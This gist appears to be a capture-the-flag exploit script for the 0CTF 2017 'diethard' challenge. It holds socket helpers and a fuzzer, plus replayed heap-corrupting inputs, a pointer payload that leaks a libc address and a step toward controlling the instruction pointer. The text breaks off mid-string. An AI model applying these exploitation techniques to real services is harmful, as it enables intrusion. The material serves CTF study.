Created
March 21, 2017 14:40
-
-
Save hhc0null/35fda85f226db1690c944b5943028794 to your computer and use it in GitHub Desktop.
A foolish solution for 0CTF 2017 diethard
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| import binascii | |
| import collections | |
| import hashlib | |
| import itertools | |
| import re | |
| import os | |
| import random | |
| import shlex | |
| import socket | |
| import string | |
| import struct | |
| import subprocess | |
| import sys | |
| import tempfile | |
| import time | |
| import telnetlib | |
| # Utilities | |
| def p(x, t="<Q"): | |
| return struct.pack(t, x) | |
| def pl(l): | |
| return ''.join(map(p, l)) | |
| def u(x, t="<Q"): | |
| return struct.unpack(t, x)[0] | |
| def ui(x): | |
| return u(p(x, t="<q"), t="<Q") | |
| ''' | |
| def a2n(s): | |
| return socket.inet_aton(s) | |
| def n2a(s): | |
| return socket.inet_ntoa(s) | |
| ''' | |
| def nasm(code, bits=32): | |
| source_path = None | |
| with tempfile.NamedTemporaryFile(prefix='shellcode', delete=False) as tf: | |
| source_path = tf.name | |
| tf.write("BITS %d\n%s"%(bits, code)) | |
| object_path = source_path[:-2]+'.o' | |
| try: | |
| subprocess.check_call( | |
| 'nasm %s -o %s'%(source_path, object_path), shell=True) | |
| except subprocess.CalledProcessError: | |
| print '[!] Cannot generate a source code.' | |
| sys.exit(-1) | |
| with open(object_path, 'rb') as f: | |
| shellcode = f.read() | |
| os.remove(source_path) | |
| os.remove(object_path) | |
| return shellcode | |
| def _dp(data): | |
| global _debug | |
| if not _debug: | |
| return False | |
| if all(ch in string.printable for ch in data): | |
| print '[DEBUG] - raw\n', data | |
| else: | |
| print '[DEBUG] - repr\n', repr(data) | |
| return True | |
| # Communicators | |
| def read_until(f, delim='\n'): | |
| data = "" | |
| while not data.endswith(delim): | |
| data += f.read(1) | |
| return data | |
| def connect(rhp): | |
| s = socket.create_connection(rhp) | |
| f = s.makefile('rw', bufsize=0) | |
| print '[+] Connected to %s:%d'%(rhp) | |
| return s, f | |
| def interact(s): | |
| t = telnetlib.Telnet() | |
| t.sock = s | |
| print '[+] your shell.' | |
| t.interact() | |
| ### user-defined | |
| class IO(object): | |
| def __init__(self, rhp): | |
| self.rhp = rhp | |
| self.s, self.f = connect(self.rhp) | |
| def _read(self, size): | |
| return self.s.recv(size) | |
| def _write(self, buf): | |
| self.s.send(buf) | |
| def write(self, buf, end=''): | |
| self._write(buf+end) | |
| def writeln(self, buf): | |
| self.write(buf, end='\n') | |
| def read_until(self, delim='\n'): | |
| buf = '' | |
| while not buf.endswith(delim): | |
| buf += self._read(1) | |
| return buf | |
| def flush(self): | |
| self.f.flush() | |
| def interact(self): | |
| interact(self.s) | |
| def close(self): | |
| self.f.close() | |
| self.s.close() | |
| class ClientIO(IO): | |
| def __init__(self, rhp, debug=False): | |
| self.debug = debug | |
| super(ClientIO, self).__init__(rhp) | |
| r = self.read_until('3. Exit\n\n') | |
| data = r | |
| _dp(data) | |
| self.messages = [] | |
| def add_message(self, length, message): | |
| tpl = collections.namedtuple('Message', ('length', 'message')) | |
| tpl.length = length | |
| tpl.message = message | |
| self.writeln(str(1)) | |
| r = self.read_until('Input Message Length:') | |
| data = r | |
| self.writeln(str(length)) | |
| r = self.read_until('Please Input Message:') | |
| data += r | |
| self.writeln(message) | |
| r = self.read_until('3. Exit\n\n') | |
| data += r | |
| self.messages.append(tpl) | |
| def delete_message(self, index): | |
| recv_messages = [] | |
| self.writeln(str(2)) | |
| r = self.read_until('Index. Message\n') | |
| data = r | |
| delim = 'Which Message You Want To Delete?\n' | |
| r = self.read_until(delim) | |
| data += r | |
| for line in r[:-len(delim)].split('\n')[:-1]: | |
| message = line.split('. ')[1] | |
| tpl = collections.namedtuple('Message', ('length', 'message')) | |
| tpl.length = len(message) | |
| tpl.message = message | |
| recv_messages.append(tpl) | |
| self.writeln(str(index)) | |
| r = self.read_until('3. Exit\n\n') | |
| data += r | |
| messages = self.messages | |
| self.messages = messages[:index] + messages[index+1:] | |
| return data | |
| def exit(self): | |
| self.writeln(str(3)) | |
| def select_size(): | |
| return random.randrange(1, 0x7e1) if random.random() < 0.5 else random.randrange(0x7e1, 0x800) | |
| def select_choice(): | |
| return 1 if random.random() < 0.7 else 2 | |
| def generate_message(size): | |
| if random.random() < 0.3: | |
| size = random.randrange(1, size) | |
| return ''.join(map(lambda _: random.choice(string.ascii_letters+string.digits), range(size))) | |
| def fuzz(client): | |
| payload = '' | |
| try: | |
| n = 0 | |
| for i in range(0x8): | |
| l = len(client.messages) | |
| if l == 0: | |
| choice = 1 | |
| elif l == 10: | |
| choice = 2 | |
| else: | |
| choice = select_choice() | |
| if choice == 1: | |
| size = select_size() | |
| message = generate_message(size) | |
| payload += ' d%d = %s\n'%(n, repr(message)) | |
| payload += ' client.add_message(%d, d%d)\n'%(size, n) | |
| payload += '\n' | |
| client.add_message(size, message) | |
| n += 1 | |
| #print '[*] Added message: (%dbytes)'% size | |
| else: | |
| idx = random.randrange(len(client.messages)) | |
| payload += ' client.delete_message(%d)\n'% idx | |
| payload += '\n' | |
| client.delete_message(idx) | |
| #print '[*] Deleted message: # %d'%(idx) | |
| except: | |
| filename = raw_input('Filename: ') | |
| with open(filename, 'w') as wf: | |
| wf.write(payload+'\n') | |
| wf.write(' raw_input("Waiting...")\n') | |
| wf.write(' client.interact()\n') | |
| if __name__ == '__main__': | |
| argc = len(sys.argv) | |
| if argc < 3: | |
| print >> sys.stderr, "Usage: %s HOST PORT [IS_LOCAL]"%(sys.argv[0]) | |
| sys.exit(1) | |
| rhp, local = (sys.argv[1], int(sys.argv[2])), argc > 3 | |
| _debug = False | |
| if local: | |
| offset_libc_puts = 0x000000000006a110 # W puts | |
| else: | |
| offset_libc_puts = 0x000000000006b990 # W puts | |
| client = ClientIO(rhp) | |
| #fuzz(client) | |
| d0 = '61vs7d4WZntHiJbdYlKkjsY8aSBdJjmjSvxReLURDmo2F9312mY3zyAtFyfU4bOxIVYbpK48ckvPeiJfPqmUUxy2k4kQNzqZ4aho3VOm9jj7sYx1QnIdYWDNBPuMZdy91ZUay7MTCN4VMFs1wFJjg0voPpO5wJBQQKLJjC6LwwQLEasY86n1HCGElx4jRBZiB6u9MND3jpyzqyQLdaiJGmRTEZc7RRxT5vCz5hQpnf0Uly7DXw2biw49dqo0Kr2fjRaTIU7IVaSxQrZTeCxBrtkV23AbhOWNTKtYDfHLHwurAN8xHIdT3LmlL1y3abzIlsM4xjc0Iieu5uY0wjDGZazpbEKwN9LqVUDCZ3jUT6uQd5QqKsbvvclXfFzcS4vfkunrlE7qWzZ87YOmuhfUZQMw8YTmj4Kp7F4EdgHHaHDXv3L3RpRkTGfUW47oJfXL6KpTmWGD64YwQZaVRClWrlLvbjRry944JciC7OaCAD1GzhvQEKwrZc7B4CR9Rgc9qmFvG91tAARmN0FjDIVEiVGeUNs9uFvA3a7FIwdHp7yIKPqmzHVbjlHvfZJZOiBBtoKfOp61qKitdAqrecaexlScNsmE63hplGl7YnbX8LnZrFxs22SvoCDJrLTW8Zhm5pT' | |
| client.add_message(2045, d0) | |
| d1 = 'OybyZG5n1xy2ygOpSmHD01wIBp6YvaOueLYZl6APOEEFHBXRrrf7BU3PJo2uLnr3CfygxWosY8kGhDSW68x6TdW994aeAO2IhX7DMw82l45Ambi9zXSkGG2ze9oBGpRYLLJdtv0uirSucqKVKw4eTkYeoNW8MKmB6mNMqd1WNSqQN1QaXQQxUT2dlO5i6cuq9MAsYMat0yGnhieWxamWls1Qep6WA89beWpzxrcUrnjlbRUeWiD7Q7M819uSsoaWDsJDZpG4dNWuYAF7sCcyJapbNEW6Bla2ZRUtykVw48hg7rQlAMQ0RxgmabH3MNiyGAmS3HOf1AnenA4estWc4nXoZS3xvF7ZjpAvOAS7Ry2gGTuJ7wagiy5tyGnRcIC1Qo5CwX0MKpoOGYtlz1wY3KqBRomQjUE3Kpu17ykGBJBxyYTmU9sPVfp2uO6tCjoYtzdtJcx6ls0c6fPHwM80tVVtnA8atFSIzD2nbkHI3uRiZ5ea2oYdnRomG3UxSn5A68yBLQT452MlIzcD3EiDnwdOAwhISbLFoeHKEVSHUE2HF6XytWUywL0K27PZYOt34bv5cIjtc42IGFcv1SvpgxEzwculRgm2A8fkqwFJY6LIfS7haNoAbEBfgPpU4GcNABbho4flHVAk5WJioD9S2jrCz2D104C1HOkbYeBf6OYJQwkmQjmI8TJRMdoXusLrx1h7xprE6LUy0RO02006ofmn3cf83JbwvuLruAdaOsqLz8IqtEW8TcgNJnORleaSWAK70AaFl4AfanFtrApgfU4F4l2pb9GMbnqoSIGnOmkvFk8TMdu7ihjqWGcFxd10s02O4wjhsuutek9hIAArAU3wbuXeZIlmdSXfDS7iZ08de9a0GH4jrQo1z9pPmTxviWG58iGXKHSm7vr7H69wJ3tZnSBimeQZ3Jt1dRmcZizHWBG7Bhm1Xcy0DlL2hk1dNAy9l14kmJaxoD8IOOkfCeuO8e4YePH2IezwNopU9aCZYBAdNHb6qlsTISK9DdlU8RozV1DXTXQv7nXRetICp1IbKePd92IrETw8d5WA6x13nZY2Y9BlewyVllV5hf8pdAlA4uglZVBlJoj3CyDdUBQNCrK2tN8bWU8dHDQkM2PLn6jkYPyWpo1XY9mtGg7EzbP5PRDxCYQD5O1JfQDaQLZxkXFMGZiYyf56fV363WIsQhZQS71VCXApSn9foEW72W44DTdt3I4KSHklRt5g4ZUptCIEy6QwOc6aEiGKUktyJZlwBxh2T8CZA0tMFs75Ld5moM1Art7ZVHTvz0vLXBrL1n9DnCS1k9EAP7vET7qG10rBBfEzSkzutQixb8HgtqApw7X9HLPr35YXdhm8wQJq97DNBU8mC6v1gZx2qmlUjxlIyAoGnOnqatsDhQ1rKLLc6ZEY5yGknPQsNqoguaWuZYCQN6pcXAaj3FX4yMsN6ASR8YQfy67KsbuHRj4XXtMDPVgCceO0rB0EeR4ZBlDFPKh0EwgiFoXrMKwftagbBXceIBUmb0P4qk0pjAnWS9inFedo61t8Bcv0hsOXLDBKCO82iw2z8Z866PgXAc34n9vqzZKZBiabobKAjowxOImhurr8XY4u1u2qT4rQKdhTMkYtQ1sHmGstfa7l0gFfsmdbKKLOLECTkVAGmgrajTHCAstLrfBZmTszygqFGftZWROBE4NFjNYqmF2GEMbCC8tOJrjqLAD2NTb5nwNZcyg7EoGF4XjIcG2StqgomlCpUPdG7AETRaETptfkckfoWZ43piO97B7JGhIVduDTOuSrpF3HEWFoPMJ5GDCSPYH4xxsFnssEipm4hQMpEvGJekZwvinVj1vyq' | |
| client.add_message(1849, d1) | |
| d2 = '2aUCEkjA73IIXuW7gHwqV2z3pxQtDul4GA3OOMxhrrAOr92x3plrFyEsRASOLe45BUGcmTuFnSMZ8wcrrrUK2cSw1dEs1Q6CCnYrpVVjOHJJ6y2FmetsYa0cvJCqQKDuFJeiVeOXUiTJtlu0jPQE9dsmNmO3GAAD0PjCI9fTzISyplnZTEDxRhBpmfDMkTLUAD7Lr7Y28gXn14aoyTEAxQyICnr6oUUxJPl9dGu96MZiP0jIU7tiEsI249UfDC4CxV0k7MCvBi9YTyRgOQAJkC8VJi4g1dA9XrON3UDYHL20XEebB47vAhc9uzVdeO0EaJLSD5ytdMibIpZtPXUfMI45RUgtQrf4T69GyAizmOvQAqQK6qPGymPn2tPNnk7mHqdnV0FYQbdzH0nZ5dhXiimQQa1sl7EH46Fw9BvHCcHjUQ2ZqwYifYfRQX7mP0XEvXrt4KP9x6OWLPabecetpdhW4e36T7E9VifiBZqPNWSYuwS2CwYFpHcw1DwLykgSDw6EMqJzXJ0p4tn1WKqpGoQEBcij418k6vr4NQYQxJDEkUaAmYwVJaVZSEVhqPOdiDllYeYRskb9aj5UHcQ3NjySHjFH8wtGmLbiygxNo9A7jcxsyXCHA1yqz205Ctq4fQj2kt72NrtDEUSNT1XZJ98ukXKwHnGJn6nXWK6vqbpAK1qFdqpEaQ7VLHshh3ekDhNB8uxP39sllNrOmziruHiDv72AP1jF7HHehGau68mImJQrff6JspK4pOwSJmmuPnrMolhKvS8fx3x3FmdsqLX6c9NaQGKItlaVBDa4Ss3ygqu4VSlCEZ56I5XWLBYkqavgACCnDyx0E6OMF9uBa8NQjAw1NcxhQ5SJ8ZDeR2tAiJM5OhfFYfWsfO6KA46Jdwp8rI788zLIZ9xPIMXL1AGg6qhrb3Z7h7SwcQu4d5cTKuzzmr6KQZrCdEySvfx2rhIUqnSeRA6yHvtQcI5tHMN0GkS83qoBwn3tY6ye9U5ssosrOxZEIyrBvm5JMfV9STP0epCLvB7ntggRchUYCei5lk0cq3k79gs82yWUuvIjPcvzxPwMT03QwRSe0d1OoaRkpMrZoviuvqWiSK2cGA2niCQ35moSHhLSva1p41F2OLiLhJ8r0qOqBuJc776exe6J4bnrn9M5iZ0lihNrOkhdedPqumGpToQaH0fBfY85CiClWEPrgS0qX5bSKCZMRHHYDZK0Eq5uw3PkOnwlRaZmimcPet1jkIGdZAG8yOvASp6v2A8KMSRepsnq079Z35wKJIHJeux8eXxBoxr3DqethNVJxkIwXVKeCwXnSkWS9tANPMW49JIMCEXiqTZt9iKKuPojXsVWbKSI2yZNj2STP0Gp1xupfnpv9w3U2yxdPNdxfH2DsD3zH92QAJOeJptfq46vXuopz80w7TqEnaLN7Al2rZuAi1x' | |
| client.add_message(1443, d2) | |
| d3 = 'WCOjlmA24YZXLM59aKma5kRB00ymM66KPbcj7YsaeQT7HDxI1ynvS5nKVRKDh9Fmd33I1wdGhBkKP0T0bfHLaTU79GfeR5Bb1UHh3FTt2xU3fTKgFMqRZoySDMhMo91527giXvURfFnUcBVZInOD5DJIeYmyLie0uYkwVIM8bUva6iciFwC7vNPoYIqUbU9Wa3MhRq9zlgu9s1jxW5oHuPEleWztaZJjG9Z2C62TEyizixYonO2yTN6a75sTwOJWxzf86UKWVGKHOynwF4fTJcnTB21a6O4aJzvab5WPgvMJfbGXu6foBy2qX6eGFttrhLBYXfObZlmWRZSz05PEdf1FM24XXDmW9bISwdJZs1oMwnyhbBeXxeatS40QHbD3Qvzj3DdwtZgBFDiNrCOg5mm4ngqXhgJ3olFujDAhJQ1QIGcgnkM815lluJfqus5k3trDIRCKwkmOJeaBkO0WOn1KUqBcCrnPCrOExz78o2Avs9g01OIe26MN5yh3QMVMWM07vbeBIAEDpuMdVGaXfDVvVuEMnl29hIwvPJDPGqB0bxE1ICKByf8Nr3gUHQaX6bSEk1T6wUEABMpCfs5YZmzA3iXyUl78t9DlmmJwgnO8GnaaRJza3iksUL0qnWjuHHeZa41i5dMCcVUS1C1Cnd4pHAyvaQOJWNakYnuefKuNXYy3ElKu5AtrTrrFgazBoV2rpz80362JLWwGqtvX8dhjL5Prls07' | |
| client.add_message(736, d3) | |
| d4 = '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' | |
| client.add_message(2044, d4) | |
| client.delete_message(1) | |
| # crashed with SEGV and got RIP. | |
| # d5 = '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' | |
| payload = ''.join(( | |
| p(1), | |
| p(0x8), | |
| p(0x603260)[:-2], | |
| )) | |
| client.add_message(2044, payload) | |
| # calc libc base | |
| data = client.delete_message(0xf00l) | |
| addr = u(data.split('2. ')[1][:8]) | |
| libc_base = addr - offset_libc_puts # calc from puts() | |
| print '[*] libc base: 0x%08x'% libc_base | |
| #fuzz(client) | |
| # get eip | |
| d6 = 'C6s6QbDgABVFMsWa2iclC0vMpw0Drc8m9G7CEKScjFwqKr0QpLKIX43LtuEppjKjBLmgecUHK6ob0zdg92uptgFfyfb1jTKPJn2tKLv9h8FawKlWE9FN3i0xJf9iTdVMbRylBxcalRXgKgx6ECCCIp813Vav38SX05Fr4WY9PhENe3cS3Zuj3u9VllGEMnqqrFIQiVFASnkQFLXjRbknJTmZ2N2aH6zcYCOjfrwlQjurg2JvUwYwEiVUZDkKOo4GArqMLn3VWtttyvUQOsRSX9DXUvAxWkukx4FwChQjGpppgH4yvDNxxt6teYUVaS3GhZ2180cOf5KFQRoS' | |
| client.add_message(336, d6) | |
| d7 = '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' | |
| client.add_message(2047, d7) | |
| client.delete_message(1) | |
| # crashed with SEGV and got RIP again. | |
| # d8 = '4SyKOCFllW4ERIemRPbUyoKnM1yRS1gMOLBd02HSwMGtMTDgfmh7zr8tZ145Ws94HX2TX49uecIc9ZTdAI6n2pcZgAosrVaixiDWakyak5HtUugQ3rFsHmHPXqb6usrFUqzVk7voQPTpYZXOvCrqMRDJXPXistjFYdLfdLL8W8eZ8O4ppQmgH7D50ZaQCEz7nwwiqrwZ6W0OybZKbVab1YPp0bW35WMhi21hCnwGpMwTSY1i4c1NrlIf7fiiW6L7sAjhEivehd1O9IukTKga12eCZBAMKWiF9FOfFjD2mocDYXWyKB4ZiyOPwxGnQ33rM514GyvvizjFeGBrBaYR72Ooje4XAIxm4ryPAIxzxu3ljcpvnTVNA9Z8LmrTGWJmpm5z0ioRpEwpnKx8q91n97xrzi80sm1thJgv3sBbWLCMCOAtJRNgKWMHOlCUgDU4E2YiqZvuboucPtbXToWxxfyue4ZVcKbpAUVuQsjWFpmo61yG7cNslsssgaeC1arfmtLhO3CdcPicNHq9FscWZXFLkjjX0AcAyONrEh4zf5tQYXs10VGv6e8eE5JPyaDbt1m6WJRgUfjheUpycCZcsiXOVHxpXGnI68kKBDRTqvXu3zdqLf3hutYyMHsw3JjQogyUUiveD87R1lILwnKRwhYiBzNV99v8fnQZEzd9NLfDOEyO7hdHYkh0gtGWAxEU5Gv5vNM2Yt93XA1LwSHOHYTvFn2z5gmFNDbsDvRhmba9giI4ux3KEgjImwv9YZLY8suKNVzewhRSIm6o8vjcXECYygSLegtZaFU6yh9MdzAH7ekqD066aqfHQzss2PhfzDBOBQuK4x6iizadWmR5IMkbk45j3QCzKJSNwHpNS0xKN3WWmyLoVOg6dPKZHFKEVPyeZoGE9BLQLWfb7WagsOhK46WfwhPLx2pHSaxsV1xqTpurHtnYW8vYs5fuaOSqDF5C3ABPFSjCHF6JVewunQI7M80ZWOco4PM0DnoZxEvZ2F01HKx1xtjg2yqY9FEgzOwzzmyeQ4xtziBxTPGehh4wMc14vWr1H0knHYKNj3eGjue6CtUYqFlhbnDzcb2U4iRudmGdIHUHRQPstpQN2IvebcjsZboiXZxfvj2EvnHKICTxwzUzy27QUjRzaS20XwmgiPuYcxiq2N73cZhgTWNF5EJlYNo